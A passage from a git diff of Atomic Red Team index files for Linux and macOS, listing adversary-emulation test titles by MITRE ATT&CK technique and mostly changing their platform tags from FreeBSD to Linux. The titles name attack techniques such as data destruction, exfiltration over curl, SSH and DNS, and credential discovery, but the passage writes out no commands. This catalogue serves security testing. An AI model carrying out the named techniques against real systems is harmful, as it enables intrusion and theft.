TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1496 Resource Hijacking](../../T1496/T1496.md) - - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux] + - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos] - T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1485 Data Destruction](../../T1485/T1485.md) - - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos] + - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1529 System Shutdown/Reboot](../../T1529/T1529.md) - - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [freebsd, linux] + - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [linux] + - Atomic Test #7: Reboot System via `halt` - FreeBSD [linux] - Atomic Test #8: Reboot System via `halt` - Linux [linux] - - Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [freebsd, linux] + - Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux] + - Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux] - Atomic Test #11: Reboot System via `poweroff` - Linux [linux] # execution - T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -709,34 +815,39 @@ - Atomic Test #3: Create a system level transient systemd service and timer [linux] - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) - - Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos] - - Atomic Test #2: Command-Line Interface [freebsd, linux, macos] + - Atomic Test #1: Create and Execute Bash Shell Script [linux, macos] + - Atomic Test #2: Command-Line Interface [linux, macos] - Atomic Test #3: Harvest SUID executable files [linux] - Atomic Test #4: LinEnum tool execution [linux] - - Atomic Test #5: New script file in the tmp directory [freebsd, linux] - - Atomic Test #6: What shell is running [freebsd, linux] - - Atomic Test #7: What shells are available [freebsd, linux] - - Atomic Test #8: Command line scripts [freebsd, linux] + - Atomic Test #5: New script file in the tmp directory [linux] + - Atomic Test #6: What shell is running [linux] + - Atomic Test #7: What shells are available [linux] + - Atomic Test #8: Command line scripts [linux] - Atomic Test #9: Obfuscated command line scripts [linux] + - Atomic Test #10: Obfuscated command line scripts (freebsd) [linux] - Atomic Test #11: Change login shell [linux] + - Atomic Test #12: Change login shell (freebsd) [linux] - Atomic Test #13: Environment variable scripts [linux] + - Atomic Test #14: Environment variable scripts (freebsd) [linux] - Atomic Test #15: Detecting pipe-to-shell [linux] + - Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux] - Atomic Test #17: Current kernel information enumeration [linux] - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) - - Atomic Test #1: Execute shell script via python's command mode arguement [freebsd, linux] - - Atomic Test #2: Execute Python via scripts [freebsd, linux] - - Atomic Test #3: Execute Python via Python executables [freebsd, linux] - - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [freebsd, linux] + - Atomic Test #1: Execute shell script via python's command mode arguement [linux] + - Atomic Test #2: Execute Python via scripts [linux] + - Atomic Test #3: Execute Python via Python executables [linux] + - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux] - T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #2: At - Schedule a job [linux] + - Atomic Test #3: At - Schedule a job freebsd [linux] # initial-access - T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -760,8 +871,11 @@ - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] + - Atomic Test #13: Login as nobody (freebsd) [linux] # exfiltration - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -772,21 +886,22 @@ - T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) - - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd] + - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux] - T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md) - - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd] - - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd] + - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux] + - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux] - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1030 Data Transfer Size Limits](../../T1030/T1030.md) - - Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd] + - Atomic Test #1: Data Transfer Size Limits [macos, linux] - T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) - - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd] - - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [freebsd, linux] + - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux] + - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux] - Atomic Test #8: Python3 http.server [linux] + - Atomic Test #9: Python3 http.server (freebsd) [linux] diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 2a38261e2a..4e5339a797 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -8,13 +8,13 @@ - T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) - - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux] - - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux] - - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux] - - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux] + - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos] + - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos] + - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos] + - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos] - Atomic Test #5: chown - Change file or folder ownership and group [macos, linux] - Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux] - - Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux] + - Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos] - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux] - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux] - Atomic Test #11: Chmod through c script [macos, linux] @@ -28,7 +28,7 @@ - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux] - T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) - - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd] + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) @@ -60,10 +60,10 @@ - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos] - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos] - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - - Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos] - - Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos] + - Atomic Test #3: Base64 decoding with Python [linux, macos] + - Atomic Test #4: Base64 decoding with Perl [linux, macos] - Atomic Test #5: Base64 decoding with shell utilities [linux, macos] - - Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos] + - Atomic Test #8: Hex decoding with shell utilities [linux, macos] - Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos] - Atomic Test #10: XOR decoding and command execution using Python [linux, macos] - T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -75,10 +75,10 @@ - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) - - Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos] - - Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos] - - Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos] - - Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos] + - Atomic Test #1: Set a file's access timestamp [linux, macos] + - Atomic Test #2: Set a file's modification timestamp [linux, macos] + - Atomic Test #3: Set a file's creation timestamp [linux, macos] + - Atomic Test #4: Modify file timestamps using reference file [linux, macos] - T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -87,8 +87,8 @@ - T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) - - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux] - - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux] + - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos] + - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos] - [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #3: Enable Guest Account on macOS [macos] - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) @@ -148,9 +148,9 @@ - [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md) - Atomic Test #4: Install root CA on macOS [macos] - [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md) - - Atomic Test #3: C compile [freebsd, linux, macos] - - Atomic Test #4: CC compile [freebsd, linux, macos] - - Atomic Test #5: Go compile [freebsd, linux, macos] + - Atomic Test #3: C compile [linux, macos] + - Atomic Test #4: CC compile [linux, macos] + - Atomic Test #5: Go compile [linux, macos] - T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -161,8 +161,8 @@ - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) - - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos] - - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos] + - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos] + - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos] - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md) - Atomic Test #3: Binary simply packed by UPX [macos] @@ -174,7 +174,7 @@ - Atomic Test #1: Space After Filename (Manual) [macos] - Atomic Test #2: Space After Filename [macos, linux] - [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md) - - Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos] + - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] - Atomic Test #2: Mac Hidden file [macos] - Atomic Test #5: Hidden files [macos] - Atomic Test #6: Hide a Directory [macos] @@ -203,15 +203,15 @@ - T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1176 Browser Extensions](../../T1176/T1176.md) - - Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos] - - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos] - - Atomic Test #3: Firefox [freebsd, linux, windows, macos] + - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] - [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) - Atomic Test #1: Logon Scripts - Mac [macos] @@ -233,7 +233,7 @@ - T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md) - - Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux] + - Atomic Test #1: Modify SSH Authorized Keys [linux, macos] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -323,7 +323,7 @@ - Atomic Test #4: Tor Proxy Usage - MacOS [macos] - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1571 Non-Standard Port](../../T1571/T1571.md) - - Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos] + - Atomic Test #2: Testing usage of uncommonly used port [linux, macos] - T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -334,19 +334,19 @@ - T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) - - Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos] + - Atomic Test #3: Malicious User Agents - Nix [linux, macos] - [T1105 Ingress Tool Transfer](../../T1105/T1105.md) - - Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos] - - Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos] - - Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos] - - Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #14: whois file download [freebsd, linux, macos] + - Atomic Test #1: rsync remote file copy (push) [linux, macos] + - Atomic Test #2: rsync remote file copy (pull) [linux, macos] + - Atomic Test #3: scp remote file copy (push) [linux, macos] + - Atomic Test #4: scp remote file copy (pull) [linux, macos] + - Atomic Test #5: sftp remote file copy (push) [linux, macos] + - Atomic Test #6: sftp remote file copy (pull) [linux, macos] + - Atomic Test #14: whois file download [linux, macos] - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md) - - Atomic Test #1: Connection Proxy [freebsd, macos, linux] + - Atomic Test #1: Connection Proxy [linux, macos] - Atomic Test #2: Connection Proxy for macOS UI [macos] - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -356,9 +356,9 @@ # collection - [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) - Atomic Test #5: Data Compressed - nix - zip [linux, macos] - - Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos] - - Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos] - - Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux] + - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] + - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] + - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos] - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos] - [T1113 Screen Capture](../../T1113/T1113.md) - Atomic Test #1: Screencapture [macos] @@ -422,7 +422,7 @@ - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -518,7 +518,7 @@ - Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos] - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) - - Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux] + - Atomic Test #2: Discover Private SSH Keys [linux, macos] - Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux] - Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux] - T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -527,10 +527,10 @@ - [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) - - Atomic Test #1: Find AWS credentials [freebsd, macos, linux] + - Atomic Test #1: Find AWS credentials [macos, linux] - Atomic Test #2: Extract Browser and System credentials with LaZagne [macos] - - Atomic Test #3: Extract passwords with grep [freebsd, macos, linux] - - Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux] + - Atomic Test #3: Extract passwords with grep [linux, macos] + - Atomic Test #6: Find and Access Github Credentials [linux, macos] - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -552,17 +552,17 @@ # discovery - [T1033 System Owner/User Discovery](../../T1033/T1033.md) - - Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos] + - Atomic Test #2: System Owner/User Discovery [linux, macos] - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1087.002 Account Discovery: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md) - - Atomic Test #2: View sudoers access [freebsd, linux, macos] - - Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos] - - Atomic Test #4: List opened files by user [freebsd, linux, macos] - - Atomic Test #7: Enumerate users and groups [freebsd, linux, macos] + - Atomic Test #2: View sudoers access [linux, macos] + - Atomic Test #3: View accounts with UID 0 [linux, macos] + - Atomic Test #4: List opened files by user [linux, macos] + - Atomic Test #7: Enumerate users and groups [linux, macos] - Atomic Test #8: Enumerate users and groups [macos] - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos] @@ -577,9 +577,9 @@ - T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1082 System Information Discovery](../../T1082/T1082.md) - Atomic Test #2: System Information Discovery [macos] - - Atomic Test #3: List OS Information [freebsd, linux, macos] - - Atomic Test #8: Hostname Discovery [freebsd, linux, macos] - - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux] + - Atomic Test #3: List OS Information [linux, macos] + - Atomic Test #8: Hostname Discovery [linux, macos] + - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos] - Atomic Test #13: Show System Integrity Protection status (MacOS) [macos] - T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -592,16 +592,16 @@ - Atomic Test #9: List macOS Firewall Rules [macos] - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1083 File and Directory Discovery](../../T1083/T1083.md) - - Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux] - - Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux] + - Atomic Test #3: Nix File and Directory Discovery [linux, macos] + - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - - Atomic Test #3: System Network Connections Discovery FreeBSD, 